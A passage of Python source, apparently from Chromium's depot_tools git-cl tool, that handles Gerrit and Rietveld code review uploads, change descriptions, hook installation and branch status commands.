refspec = '%s:refs/for/%s%s' % (ref_to_push, branch, refspec_suffix)
push_stdout = gclient_utils.CheckCallAndFilter(
['git', 'push', gerrit_remote, refspec],
print_stdout=True,
# Flush after every line: useful for seeing progress when running as
# recipe.
filter_fn=lambda _: sys.stdout.flush())
if options.squash:
regex = re.compile(r'remote:\s+https?://[\w\-\.\/]*/(\d+)\s.*')
change_numbers = [m.group(1)
for m in map(regex.match, push_stdout.splitlines())
if m]
if len(change_numbers) != 1:
DieWithError(
('Created|Updated %d issues on Gerrit, but only 1 expected.\n'
'Change-Id: %s') % (len(change_numbers), change_id))
self.SetIssue(change_numbers[0])
RunGit(['config', 'branch.%s.gerritsquashhash' % self.GetBranch(),
ref_to_push])
return 0
def _AddChangeIdToCommitMessage(self, options, args):
"""Re-commits using the current message, assumes the commit hook is in
place.
"""
log_desc = options.message or CreateDescriptionFromLog(args)
git_command = ['commit', '--amend', '-m', log_desc]
RunGit(git_command)
new_log_desc = CreateDescriptionFromLog(args)
if git_footers.get_footer_change_id(new_log_desc):
print('git-cl: Added Change-Id to commit message.')
return new_log_desc
else:
DieWithError('ERROR: Gerrit commit-msg hook not installed.')
def SetCQState(self, new_state):
"""Sets the Commit-Queue label assuming canonical CQ config for Gerrit."""
# TODO(tandrii): maybe allow configurability in codereview.settings or by
# self-discovery of label config for this CL using REST API.
vote_map = {
_CQState.NONE: 0,
_CQState.DRY_RUN: 1,
_CQState.COMMIT : 2,
}
gerrit_util.SetReview(self._GetGerritHost(), self.GetIssue(),
labels={'Commit-Queue': vote_map[new_state]})
_CODEREVIEW_IMPLEMENTATIONS = {
'rietveld': _RietveldChangelistImpl,
'gerrit': _GerritChangelistImpl,
}
def _add_codereview_select_options(parser):
"""Appends --gerrit and --rietveld options to force specific codereview."""
parser.codereview_group = optparse.OptionGroup(
parser, 'EXPERIMENTAL! Codereview override options')
parser.add_option_group(parser.codereview_group)
parser.codereview_group.add_option(
'--gerrit', action='store_true',
help='Force the use of Gerrit for codereview')
parser.codereview_group.add_option(
'--rietveld', action='store_true',
help='Force the use of Rietveld for codereview')
def _process_codereview_select_options(parser, options):
if options.gerrit and options.rietveld:
parser.error('Options --gerrit and --rietveld are mutually exclusive')
options.forced_codereview = None
if options.gerrit:
options.forced_codereview = 'gerrit'
elif options.rietveld:
options.forced_codereview = 'rietveld'
class ChangeDescription(object):
"""Contains a parsed form of the change description."""
R_LINE = r'^[ \t]*(TBR|R)[ \t]*=[ \t]*(.*?)[ \t]*$'
BUG_LINE = r'^[ \t]*(BUG)[ \t]*=[ \t]*(.*?)[ \t]*$'
def __init__(self, description):
self._description_lines = (description or '').strip().splitlines()
@property # www.logilab.org/ticket/89786
def description(self): # pylint: disable=E0202
return '\n'.join(self._description_lines)
def set_description(self, desc):
if isinstance(desc, basestring):
lines = desc.splitlines()
else:
lines = [line.rstrip() for line in desc]
while lines and not lines[0]:
lines.pop(0)
while lines and not lines[-1]:
lines.pop(-1)
self._description_lines = lines
def update_reviewers(self, reviewers, add_owners_tbr=False, change=None):
"""Rewrites the R=/TBR= line(s) as a single line each."""
assert isinstance(reviewers, list), reviewers
if not reviewers and not add_owners_tbr:
return
reviewers = reviewers[:]
# Get the set of R= and TBR= lines and remove them from the desciption.
regexp = re.compile(self.R_LINE)
matches = [regexp.match(line) for line in self._description_lines]
new_desc = [l for i, l in enumerate(self._description_lines)
if not matches[i]]
self.set_description(new_desc)
# Construct new unified R= and TBR= lines.
r_names = []
tbr_names = []
for match in matches:
if not match:
continue
people = cleanup_list([match.group(2).strip()])
if match.group(1) == 'TBR':
tbr_names.extend(people)
else:
r_names.extend(people)
for name in r_names:
if name not in reviewers:
reviewers.append(name)
if add_owners_tbr:
owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=os.path, glob=glob.glob)
all_reviewers = set(tbr_names + reviewers)
missing_files = owners_db.files_not_covered_by(change.LocalPaths(),
all_reviewers)
tbr_names.extend(owners_db.reviewers_for(missing_files,
change.author_email))
new_r_line = 'R=' + ', '.join(reviewers) if reviewers else None
new_tbr_line = 'TBR=' + ', '.join(tbr_names) if tbr_names else None
# Put the new lines in the description where the old first R= line was.
line_loc = next((i for i, match in enumerate(matches) if match), -1)
if 0 <= line_loc < len(self._description_lines):
if new_tbr_line:
self._description_lines.insert(line_loc, new_tbr_line)
if new_r_line:
self._description_lines.insert(line_loc, new_r_line)
else:
if new_r_line:
self.append_footer(new_r_line)
if new_tbr_line:
self.append_footer(new_tbr_line)
def prompt(self):
"""Asks the user to update the description."""
self.set_description([
'# Enter a description of the change.',
'# This will be displayed on the codereview site.',
'# The first line will also be used as the subject of the review.',
'#--------------------This line is 72 characters long'
'--------------------',
] + self._description_lines)
regexp = re.compile(self.BUG_LINE)
if not any((regexp.match(line) for line in self._description_lines)):
self.append_footer('BUG=%s' % settings.GetBugPrefix())
content = gclient_utils.RunEditor(self.description, True,
git_editor=settings.GetGitEditor())
if not content:
DieWithError('Running editor failed')
lines = content.splitlines()
# Strip off comments.
clean_lines = [line.rstrip() for line in lines if not line.startswith('#')]
if not clean_lines:
DieWithError('No CL description, aborting')
self.set_description(clean_lines)
def append_footer(self, line):
"""Adds a footer line to the description.
Differentiates legacy "KEY=xxx" footers (used to be called tags) and
Gerrit's footers in the form of "Footer-Key: footer any value" and ensures
that Gerrit footers are always at the end.
"""
parsed_footer_line = git_footers.parse_footer(line)
if parsed_footer_line:
# Line is a gerrit footer in the form: Footer-Key: any value.
# Thus, must be appended observing Gerrit footer rules.
self.set_description(
git_footers.add_footer(self.description,
key=parsed_footer_line[0],
value=parsed_footer_line[1]))
return
if not self._description_lines:
self._description_lines.append(line)
return
top_lines, gerrit_footers, _ = git_footers.split_footers(self.description)
if gerrit_footers:
# git_footers.split_footers ensures that there is an empty line before
# actual (gerrit) footers, if any. We have to keep it that way.
assert top_lines and top_lines[-1] == ''
top_lines, separator = top_lines[:-1], top_lines[-1:]
else:
separator = [] # No need for separator if there are no gerrit_footers.
prev_line = top_lines[-1] if top_lines else ''
if (not presubmit_support.Change.TAG_LINE_RE.match(prev_line) or
not presubmit_support.Change.TAG_LINE_RE.match(line)):
top_lines.append('')
top_lines.append(line)
self._description_lines = top_lines + separator + gerrit_footers
def get_reviewers(self):
"""Retrieves the list of reviewers."""
matches = [re.match(self.R_LINE, line) for line in self._description_lines]
reviewers = [match.group(2).strip() for match in matches if match]
return cleanup_list(reviewers)
def get_approving_reviewers(props):
"""Retrieves the reviewers that approved a CL from the issue properties with
messages.
Note that the list may contain reviewers that are not committer, thus are not
considered by the CQ.
"""
return sorted(
set(
message['sender']
for message in props['messages']
if message['approval'] and message['sender'] in props['reviewers']
)
)
def FindCodereviewSettingsFile(filename='codereview.settings'):
"""Finds the given file starting in the cwd and going up.
Only looks up to the top of the repository unless an
'inherit-review-settings-ok' file exists in the root of the repository.
"""
inherit_ok_file = 'inherit-review-settings-ok'
cwd = os.getcwd()
root = settings.GetRoot()
if os.path.isfile(os.path.join(root, inherit_ok_file)):
root = '/'
while True:
if filename in os.listdir(cwd):
if os.path.isfile(os.path.join(cwd, filename)):
return open(os.path.join(cwd, filename))
if cwd == root:
break
cwd = os.path.dirname(cwd)
def LoadCodereviewSettingsFromFile(fileobj):
"""Parse a codereview.settings file and updates hooks."""
keyvals = gclient_utils.ParseCodereviewSettingsContent(fileobj.read())
def SetProperty(name, setting, unset_error_ok=False):
fullname = 'rietveld.' + name
if setting in keyvals:
RunGit(['config', fullname, keyvals[setting]])
else:
RunGit(['config', '--unset-all', fullname], error_ok=unset_error_ok)
SetProperty('server', 'CODE_REVIEW_SERVER')
# Only server setting is required. Other settings can be absent.
# In that case, we ignore errors raised during option deletion attempt.
SetProperty('cc', 'CC_LIST', unset_error_ok=True)
SetProperty('private', 'PRIVATE', unset_error_ok=True)
SetProperty('tree-status-url', 'STATUS', unset_error_ok=True)
SetProperty('viewvc-url', 'VIEW_VC', unset_error_ok=True)
SetProperty('bug-prefix', 'BUG_PREFIX', unset_error_ok=True)
SetProperty('cpplint-regex', 'LINT_REGEX', unset_error_ok=True)
SetProperty('force-https-commit-url', 'FORCE_HTTPS_COMMIT_URL',
unset_error_ok=True)
SetProperty('cpplint-ignore-regex', 'LINT_IGNORE_REGEX', unset_error_ok=True)
SetProperty('project', 'PROJECT', unset_error_ok=True)
SetProperty('pending-ref-prefix', 'PENDING_REF_PREFIX', unset_error_ok=True)
SetProperty('run-post-upload-hook', 'RUN_POST_UPLOAD_HOOK',
unset_error_ok=True)
if 'GERRIT_HOST' in keyvals:
RunGit(['config', 'gerrit.host', keyvals['GERRIT_HOST']])
if 'GERRIT_SQUASH_UPLOADS' in keyvals:
RunGit(['config', 'gerrit.squash-uploads',
keyvals['GERRIT_SQUASH_UPLOADS']])
if 'GERRIT_SKIP_ENSURE_AUTHENTICATED' in keyvals:
RunGit(['config', 'gerrit.skip-ensure-authenticated',
keyvals['GERRIT_SKIP_ENSURE_AUTHENTICATED']])
if 'PUSH_URL_CONFIG' in keyvals and 'ORIGIN_URL_CONFIG' in keyvals:
#should be of the form
#PUSH_URL_CONFIG: url.ssh://gitrw.chromium.org.pushinsteadof
#ORIGIN_URL_CONFIG: http://src.chromium.org/git
RunGit(['config', keyvals['PUSH_URL_CONFIG'],
keyvals['ORIGIN_URL_CONFIG']])
def urlretrieve(source, destination):
"""urllib is broken for SSL connections via a proxy therefore we
can't use urllib.urlretrieve()."""
with open(destination, 'w') as f:
f.write(urllib2.urlopen(source).read())
def hasSheBang(fname):
"""Checks fname is a #! script."""
with open(fname) as f:
return f.read(2).startswith('#!')
# TODO(bpastene) Remove once a cleaner fix to crbug.com/600473 presents itself.
def DownloadHooks(*args, **kwargs):
pass
def DownloadGerritHook(force):
"""Download and install Gerrit commit-msg hook.
Args:
force: True to update hooks. False to install hooks if not present.
"""
if not settings.GetIsGerrit():
return
src = 'https://gerrit-review.googlesource.com/tools/hooks/commit-msg'
dst = os.path.join(settings.GetRoot(), '.git', 'hooks', 'commit-msg')
if not os.access(dst, os.X_OK):
if os.path.exists(dst):
if not force:
return
try:
urlretrieve(src, dst)
if not hasSheBang(dst):
DieWithError('Not a script: %s\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % (dst, src))
os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
except Exception:
if os.path.exists(dst):
os.remove(dst)
DieWithError('\nFailed to download hooks.\n'
'You need to download from\n%s\n'
'into .git/hooks/commit-msg and '
'chmod +x .git/hooks/commit-msg' % src)
def GetRietveldCodereviewSettingsInteractively():
"""Prompt the user for settings."""
server = settings.GetDefaultServerUrl(error_ok=True)
prompt = 'Rietveld server (host[:port])'
prompt += ' [%s]' % (server or DEFAULT_SERVER)
newserver = ask_for_data(prompt + ':')
if not server and not newserver:
newserver = DEFAULT_SERVER
if newserver:
newserver = gclient_utils.UpgradeToHttps(newserver)
if newserver != server:
RunGit(['config', 'rietveld.server', newserver])
def SetProperty(initial, caption, name, is_url):
prompt = caption
if initial:
prompt += ' ("x" to clear) [%s]' % initial
new_val = ask_for_data(prompt + ':')
if new_val == 'x':
RunGit(['config', '--unset-all', 'rietveld.' + name], error_ok=True)
elif new_val:
if is_url:
new_val = gclient_utils.UpgradeToHttps(new_val)
if new_val != initial:
RunGit(['config', 'rietveld.' + name, new_val])
SetProperty(settings.GetDefaultCCList(), 'CC list', 'cc', False)
SetProperty(settings.GetDefaultPrivateFlag(),
'Private flag (rietveld only)', 'private', False)
SetProperty(settings.GetTreeStatusUrl(error_ok=True), 'Tree status URL',
'tree-status-url', False)
SetProperty(settings.GetViewVCUrl(), 'ViewVC URL', 'viewvc-url', True)
SetProperty(settings.GetBugPrefix(), 'Bug Prefix', 'bug-prefix', False)
SetProperty(settings.GetRunPostUploadHook(), 'Run Post Upload Hook',
'run-post-upload-hook', False)
@subcommand.usage('[repo root containing codereview.settings]')
def CMDconfig(parser, args):
"""Edits configuration for this tree."""
print('WARNING: git cl config works for Rietveld only.\n'
'For Gerrit, see http://crbug.com/603116.')
# TODO(tandrii): add Gerrit support as part of http://crbug.com/603116.
parser.add_option('--activate-update', action='store_true',
help='activate auto-updating [rietveld] section in '
'.git/config')
parser.add_option('--deactivate-update', action='store_true',
help='deactivate auto-updating [rietveld] section in '
'.git/config')
options, args = parser.parse_args(args)
if options.deactivate_update:
RunGit(['config', 'rietveld.autoupdate', 'false'])
return
if options.activate_update:
RunGit(['config', '--unset', 'rietveld.autoupdate'])
return
if len(args) == 0:
GetRietveldCodereviewSettingsInteractively()
return 0
url = args[0]
if not url.endswith('codereview.settings'):
url = os.path.join(url, 'codereview.settings')
# Load code review settings and download hooks (if available).
LoadCodereviewSettingsFromFile(urllib2.urlopen(url))
return 0
def CMDbaseurl(parser, args):
"""Gets or sets base-url for this branch."""
branchref = RunGit(['symbolic-ref', 'HEAD']).strip()
branch = ShortBranchName(branchref)
_, args = parser.parse_args(args)
if not args:
print('Current base-url:')
return RunGit(['config', 'branch.%s.base-url' % branch],
error_ok=False).strip()
else:
print('Setting base-url to %s' % args[0])
return RunGit(['config', 'branch.%s.base-url' % branch, args[0]],
error_ok=False).strip()
def color_for_status(status):
"""Maps a Changelist status to color, for CMDstatus and other tools."""
return {
'unsent': Fore.RED,
'waiting': Fore.BLUE,
'reply': Fore.YELLOW,
'lgtm': Fore.GREEN,
'commit': Fore.MAGENTA,
'closed': Fore.CYAN,
'error': Fore.WHITE,
}.get(status, Fore.WHITE)
def get_cl_statuses(changes, fine_grained, max_processes=None):
"""Returns a blocking iterable of (cl, status) for given branches.
If fine_grained is true, this will fetch CL statuses from the server.
Otherwise, simply indicate if there's a matching url for the given branches.
If max_processes is specified, it is used as the maximum number of processes
to spawn to fetch CL status from the server. Otherwise 1 process per branch is
spawned.
See GetStatus() for a list of possible statuses.
"""
# Silence upload.py otherwise it becomes unwieldly.
upload.verbosity = 0
if fine_grained:
# Process one branch synchronously to work through authentication, then
# spawn processes to process all the other branches in parallel.
if changes:
fetch = lambda cl: (cl, cl.GetStatus())
yield fetch(changes[0])
if not changes:
# Exit early if there was only one branch to fetch.
return
changes_to_fetch = changes[1:]
pool = ThreadPool(
min(max_processes, len(changes_to_fetch))
if max_processes is not None
else len(changes_to_fetch))
fetched_cls = set()
it = pool.imap_unordered(fetch, changes_to_fetch).__iter__()
while True:
try:
row = it.next(timeout=5)
except multiprocessing.TimeoutError:
break
fetched_cls.add(row[0])
yield row
# Add any branches that failed to fetch.
for cl in set(changes_to_fetch) - fetched_cls:
yield (cl, 'error')
else:
# Do not use GetApprovingReviewers(), since it requires an HTTP request.
for cl in changes:
yield (cl, 'waiting' if cl.GetIssueURL() else 'error')
def upload_branch_deps(cl, args):
"""Uploads CLs of local branches that are dependents of the current branch.
If the local branch dependency tree looks like:
test1 -> test2.1 -> test3.1
-> test3.2
-> test2.2 -> test3.3
and you run "git cl upload --dependencies" from test1 then "git cl upload" is
run on the dependent branches in this order:
test2.1, test3.1, test3.2, test2.2, test3.3
Note: This function does not rebase your local dependent branches. Use it when
you make a change to the parent branch that will not conflict with its
dependent branches, and you would like their dependencies updated in
Rietveld.
"""
if git_common.is_dirty_git_tree('upload-branch-deps'):
return 1
root_branch = cl.GetBranch()
if root_branch is None:
DieWithError('Can\'t find dependent branches from detached HEAD state. '
'Get on a branch!')
if not cl.GetIssue() or not cl.GetPatchset():
DieWithError('Current branch does not have an uploaded CL. We cannot set '
'patchset dependencies without an uploaded CL.')
branches = RunGit(['for-each-ref',
'--format=%(refname:short) %(upstream:short)',
'refs/heads'])
if not branches:
print('No local branches found.')
return 0
# Create a dictionary of all local branches to the branches that are dependent
# on it.
tracked_to_dependents = collections.defaultdict(list)
for b in branches.splitlines():
tokens = b.split()
if len(tokens) == 2:
branch_name, tracked = tokens
tracked_to_dependents[tracked].append(branch_name)
print()
print('The dependent local branches of %s are:' % root_branch)
dependents = []
def traverse_dependents_preorder(branch, padding=''):
dependents_to_process = tracked_to_dependents.get(branch, [])
padding += ' '
for dependent in dependents_to_process:
print('%s%s' % (padding, dependent))
dependents.append(dependent)
traverse_dependents_preorder(dependent, padding)
traverse_dependents_preorder(root_branch)
print()
if not dependents:
print('There are no dependent local branches for %s' % root_branch)
return 0
print('This command will checkout all dependent branches and run '
'"git cl upload".')
ask_for_data('[Press enter to continue or ctrl-C to quit]')
# Add a default patchset title to all upload calls in Rietveld.
if not cl.IsGerrit():
args.extend(['-t', 'Updated patchset dependency'])
# Record all dependents that failed to upload.
failures = {}
# Go through all dependents, checkout the branch and upload.
try:
for dependent_branch in dependents:
print()
print('--------------------------------------')
print('Running "git cl upload" from %s:' % dependent_branch)
RunGit(['checkout', '-q', dependent_branch])
print()
try:
if CMDupload(OptionParser(), args) != 0:
print('Upload failed for %s!' % dependent_branch)
failures[dependent_branch] = 1
except: # pylint: disable=W0702
failures[dependent_branch] = 1
print()
finally:
# Swap back to the original root branch.
RunGit(['checkout', '-q', root_branch])
print()
print('Upload complete for dependent branches!')
for dependent_branch in dependents:
upload_status = 'failed' if failures.get(dependent_branch) else 'succeeded'
print(' %s : %s' % (dependent_branch, upload_status))
print()
return 0
def CMDarchive(parser, args):
"""Archives and deletes branches associated with closed changelists."""
parser.add_option(
'-j', '--maxjobs', action='store', type=int,
help='The maximum number of jobs to use when retrieving review status')
parser.add_option(
'-f', '--force', action='store_true',
help='Bypasses the confirmation prompt.')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % ' '.join(args))
auth_config = auth.extract_auth_config_from_options(options)
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
return 0
print('Finding all branches associated with closed issues...')
changes = [Changelist(branchref=b, auth_config=auth_config)
for b in branches.splitlines()]
alignment = max(5, max(len(c.GetBranch()) for c in changes))
statuses = get_cl_statuses(changes,
fine_grained=True,
max_processes=options.maxjobs)
proposal = [(cl.GetBranch(),
'git-cl-archived-%s-%s' % (cl.GetIssue(), cl.GetBranch()))
for cl, status in statuses
if status == 'closed']
proposal.sort()
if not proposal:
print('No branches with closed codereview issues found.')
return 0
current_branch = GetCurrentBranch()
print('\nBranches with closed issues that will be archived:\n')
print('%*s | %s' % (alignment, 'Branch name', 'Archival tag name'))
for next_item in proposal:
print('%*s %s' % (alignment, next_item[0], next_item[1]))
if any(branch == current_branch for branch, _ in proposal):
print('You are currently on a branch \'%s\' which is associated with a '
'closed codereview issue, so archive cannot proceed. Please '
'checkout another branch and run this command again.' %
current_branch)
return 1
if not options.force:
answer = ask_for_data('\nProceed with deletion (Y/n)? ').lower()
if answer not in ('y', ''):
print('Aborted.')
return 1
for branch, tagname in proposal:
RunGit(['tag', tagname, branch])
RunGit(['branch', '-D', branch])
print('\nJob\'s done!')
return 0
def CMDstatus(parser, args):
"""Show status of changelists.
Colors are used to tell the state of the CL unless --fast is used:
- Red not sent for review or broken
- Blue waiting for review
- Yellow waiting for you to reply to review
- Green LGTM'ed
- Magenta in the commit queue
- Cyan was committed, branch can be deleted
Also see 'git cl comments'.
"""
parser.add_option('--field',
help='print only specific field (desc|id|patch|url)')
parser.add_option('-f', '--fast', action='store_true',
help='Do not retrieve review status')
parser.add_option(
'-j', '--maxjobs', action='store', type=int,
help='The maximum number of jobs to use when retrieving review status')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
if args:
parser.error('Unsupported args: %s' % args)
auth_config = auth.extract_auth_config_from_options(options)
if options.field:
cl = Changelist(auth_config=auth_config)
if options.field.startswith('desc'):
print(cl.GetDescription())
elif options.field == 'id':
issueid = cl.GetIssue()
if issueid:
print(issueid)
elif options.field == 'patch':
patchset = cl.GetPatchset()
if patchset:
print(patchset)
elif options.field == 'url':
url = cl.GetIssueURL()
if url:
print(url)
return 0
branches = RunGit(['for-each-ref', '--format=%(refname)', 'refs/heads'])
if not branches:
print('No local branch found.')
return 0
changes = [
Changelist(branchref=b, auth_config=auth_config)
for b in branches.splitlines()]
print('Branches associated with reviews:')
output = get_cl_statuses(changes,
fine_grained=not options.fast,
max_processes=options.maxjobs)
branch_statuses = {}
alignment = max(5, max(len(ShortBranchName(c.GetBranch())) for c in changes))
for cl in sorted(changes, key=lambda c: c.GetBranch()):
branch = cl.GetBranch()
while branch not in branch_statuses:
c, status = output.next()
branch_statuses[c.GetBranch()] = status
status = branch_statuses.pop(branch)
url = cl.GetIssueURL()
if url and (not status or status == 'error'):
# The issue probably doesn't exist anymore.
url += ' (broken)'
color = color_for_status(status)
reset = Fore.RESET
if not setup_color.IS_TTY:
color = ''
reset = ''
status_str = '(%s)' % status if status else ''
print(' %*s : %s%s %s%s' % (
alignment, ShortBranchName(branch), color, url,
status_str, reset))
cl = Changelist(auth_config=auth_config)
print()
print('Current branch:',)
print(cl.GetBranch())
if not cl.GetIssue():
print('No issue assigned.')
return 0
print('Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL()))
if not options.fast:
print('Issue description:')
print(cl.GetDescription(pretty=True))
return 0
def colorize_CMDstatus_doc():
"""To be called once in main() to add colors to git cl status help."""
colors = [i for i in dir(Fore) if i[0].isupper()]
def colorize_line(line):
for color in colors:
if color in line.upper():
# Extract whitespaces first and the leading '-'.
indent = len(line) - len(line.lstrip(' ')) + 1
return line[:indent] + getattr(Fore, color) + line[indent:] + Fore.RESET
return line
lines = CMDstatus.__doc__.splitlines()
CMDstatus.__doc__ = '\n'.join(colorize_line(l) for l in lines)
@subcommand.usage('[issue_number]')
def CMDissue(parser, args):
"""Sets or displays the current code review issue number.
Pass issue number 0 to clear the current issue.
"""
parser.add_option('-r', '--reverse', action='store_true',
help='Lookup the branch(es) for the specified issues. If '
'no issues are specified, all branches with mapped '
'issues will be listed.')
_add_codereview_select_options(parser)
options, args = parser.parse_args(args)
_process_codereview_select_options(parser, options)
if options.reverse:
branches = RunGit(['for-each-ref', 'refs/heads',
'--format=%(refname:short)']).splitlines()
# Reverse issue lookup.
issue_branch_map = {}
for branch in branches:
cl = Changelist(branchref=branch)
issue_branch_map.setdefault(cl.GetIssue(), []).append(branch)
if not args:
args = sorted(issue_branch_map.iterkeys())
for issue in args:
if not issue:
continue
print('Branch for issue number %s: %s' % (
issue, ', '.join(issue_branch_map.get(int(issue)) or ('None',))))
else:
cl = Changelist(codereview=options.forced_codereview)
if len(args) > 0:
try:
issue = int(args[0])
except ValueError:
DieWithError('Pass a number to set the issue or none to list it.\n'
'Maybe you want to run git cl status?')
cl.SetIssue(issue)
print('Issue number: %s (%s)' % (cl.GetIssue(), cl.GetIssueURL()))
return 0
def CMDcomments(parser, args):
"""Shows or posts review comments for any changelist."""
parser.add_option('-a', '--add-comment', dest='comment',
help='comment to add to an issue')
parser.add_option('-i', dest='issue',
help="review issue id (defaults to current issue)")
parser.add_option('-j', '--json-file',
help='File to write JSON summary to')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
issue = None
if options.issue:
try:
issue = int(options.issue)
except ValueError:
DieWithError('A review issue id is expected to be a number')
cl = Changelist(issue=issue, codereview='rietveld', auth_config=auth_config)
if options.comment:
cl.AddComment(options.comment)
return 0
data = cl.GetIssueProperties()
summary = []
for message in sorted(data.get('messages', []), key=lambda x: x['date']):
summary.append({
'date': message['date'],
'lgtm': False,
'message': message['text'],
'not_lgtm': False,
'sender': message['sender'],
})
if message['disapproval']:
color = Fore.RED
summary[-1]['not lgtm'] = True
elif message['approval']:
color = Fore.GREEN
summary[-1]['lgtm'] = True
elif message['sender'] == data['owner_email']:
color = Fore.MAGENTA
else:
color = Fore.BLUE
print('\n%s%s %s%s' % (
color, message['date'].split('.', 1)[0], message['sender'],
Fore.RESET))
if message['text'].strip():
print('\n'.join(' ' + l for l in message['text'].splitlines()))
if options.json_file:
with open(options.json_file, 'wb') as f:
json.dump(summary, f)
return 0
@subcommand.usage('[codereview url or issue id]')
def CMDdescription(parser, args):
"""Brings up the editor for the current CL's description."""
parser.add_option('-d', '--display', action='store_true',
help='Display the description instead of opening an editor')
parser.add_option('-n', '--new-description',
help='New description to set for this issue (- for stdin)')
_add_codereview_select_options(parser)
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
_process_codereview_select_options(parser, options)
target_issue = None
if len(args) > 0:
issue_arg = ParseIssueNumberArgument(args[0])
if not issue_arg.valid:
parser.print_help()
return 1
target_issue = issue_arg.issue
auth_config = auth.extract_auth_config_from_options(options)
cl = Changelist(
auth_config=auth_config, issue=target_issue,
codereview=options.forced_codereview)
if not cl.GetIssue():
DieWithError('This branch has no associated changelist.')
description = ChangeDescription(cl.GetDescription())
if options.display:
print(description.description)
return 0
if options.new_description:
text = options.new_description
if text == '-':
text = '\n'.join(l.rstrip() for l in sys.stdin)
description.set_description(text)
else:
description.prompt()
if cl.GetDescription() != description.description:
cl.UpdateDescription(description.description)
return 0
def CreateDescriptionFromLog(args):
"""Pulls out the commit log to use as a base for the CL description."""
log_args = []
if len(args) == 1 and not args[0].endswith('.'):
log_args = [args[0] + '..']
elif len(args) == 1 and args[0].endswith('...'):
log_args = [args[0][:-1]]
elif len(args) == 2:
log_args = [args[0] + '..' + args[1]]
else:
log_args = args[:] # Hope for the best!
return RunGit(['log', '--pretty=format:%s\n\n%b'] + log_args)
def CMDlint(parser, args):
"""Runs cpplint on the current changelist."""
parser.add_option('--filter', action='append', metavar='-x,+y',
help='Comma-separated list of cpplint\'s category-filters')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
# Access to a protected member _XX of a client class
# pylint: disable=W0212
try:
import cpplint
import cpplint_chromium
except ImportError:
print('Your depot_tools is missing cpplint.py and/or cpplint_chromium.py.')
return 1
# Change the current working directory before calling lint so that it
# shows the correct base.
previous_cwd = os.getcwd()
os.chdir(settings.GetRoot())
try:
cl = Changelist(auth_config=auth_config)
change = cl.GetChange(cl.GetCommonAncestorWithUpstream(), None)
files = [f.LocalPath() for f in change.AffectedFiles()]
if not files:
print('Cannot lint an empty CL')
return 1
# Process cpplints arguments if any.
command = args + files
if options.filter:
command = ['--filter=' + ','.join(options.filter)] + command
filenames = cpplint.ParseArguments(command)
white_regex = re.compile(settings.GetLintRegex())
black_regex = re.compile(settings.GetLintIgnoreRegex())
extra_check_functions = [cpplint_chromium.CheckPointerDeclarationWhitespace]
for filename in filenames:
if white_regex.match(filename):
if black_regex.match(filename):
print('Ignoring file %s' % filename)
else:
cpplint.ProcessFile(filename, cpplint._cpplint_state.verbose_level,
extra_check_functions)
else:
print('Skipping file %s' % filename)
finally:
os.chdir(previous_cwd)
print('Total errors found: %d\n' % cpplint._cpplint_state.error_count)
if cpplint._cpplint_state.error_count != 0:
return 1
return 0
def CMDpresubmit(parser, args):
"""Runs presubmit tests on the current changelist."""
parser.add_option('-u', '--upload', action='store_true',
help='Run upload hook instead of the push/dcommit hook')
parser.add_option('-f', '--force', action='store_true',
help='Run checks even if tree is dirty')
auth.add_auth_options(parser)
options, args = parser.parse_args(args)
auth_config = auth.extract_auth_config_from_options(options)
if not options.force and git_common.is_dirty_git_tree('presubmit'):
print('use --force to check even if tree is dirty.')
return 1
cl = Changelist(auth_config=auth_config)
if args:
base_branch = args[0]
else:
# Default to diffing against the common ancestor of the upstream branch.
base_branch = cl.GetCommonAncestorWithUpstream()
cl.RunHook(
committing=not options.upload,
may_prompt=False,
verbose=options.verbose,
change=cl.GetChange(base_branch, None))
return 0
def GenerateGerritChangeId(message):
"""Returns Ixxxxxx...xxx change id.
Works the same way as
https://gerrit-review.googlesource.com/tools/hooks/commit-msg
but can be called on demand on all platforms.
The basic idea is to generate git hash of a state of the tree, original commit
message, author/committer info and timestamps.
"""
lines = []
tree_hash = RunGitSilent(['write-tree'])
lines.append('tree %s' % tree_hash.strip())
code, parent = RunGitWithCode(['rev-parse', 'HEAD~0'], suppress_stderr=False)
if code == 0:
lines.append('parent %s' % parent.strip())
author = RunGitSilent(['var', 'GIT_AUTHOR_IDENT'])
lines.append('author %s' % author.strip())
committer = RunGitSilent(['var', 'GIT_COMMITTER_IDENT'])
lines.append('committer %s' % committer.strip())
lines.append('')
# Note: Gerrit's commit-hook actually cleans message of some lines and
# whitespace. This code is not doing this, but it clearly won't decrease
# entropy.
lines.append(message)
change_hash = RunCommand(['git', 'hash-object', '-t', 'commit', '--stdin'],
stdin='\n'.join(lines))
return 'I%s' % change_hash.strip()
def GetTargetRef(remote, remote_branch, target_branch, pending_prefix):
"""Computes the remote branch ref to use for the CL.
Args:
remote (str): The git remote for the CL.
remote_branch (str): The git remote branch for the CL.
target_branch (str): The target branch specified by the user.
pending_prefix (str): The pending prefix from the settings.
"""
if not (remote and remote_branch):
return None
if target_branch:
# Cannonicalize branch references to the equivalent local full symbolic
# refs, which are then translated into the remote full symbolic refs
# below.
if '/' not in target_branch:
remote_branch = 'refs/remotes/%s/%s' % (remote, target_branch)
else:
prefix_replacements = (
('^((refs/)?remotes/)?branch-heads/', 'refs/remotes/branch-heads/'),
('^((refs/)?remotes/)?%s/' % remote, 'refs/remotes/%s/' % remote),
('^(refs/)?heads/', 'refs/remotes/%s/' % remote),
)
match = None
for regex, replacement in prefix_replacements:
match = re.search(regex, target_branch)
if match:
remote_branch = target_branch.replace(match.group(0), replacement)
break
if not match:
# This is a branch path but not one we recognize; use as-is.
remote_branch = target_branch
elif remote_branch in REFS_THAT_ALIAS_TO_OTHER_REFS:
# Handle the refs that need to land in different refs.
remote_branch = REFS_THAT_ALIAS_TO_OTHER_REFS[remote_branch]
# Create the true path to the remote branch.
# Does the following translation:
# * refs/remotes/origin/refs/diff/test -> refs/diff/test
# * refs/remotes/origin/master -> refs/heads/master
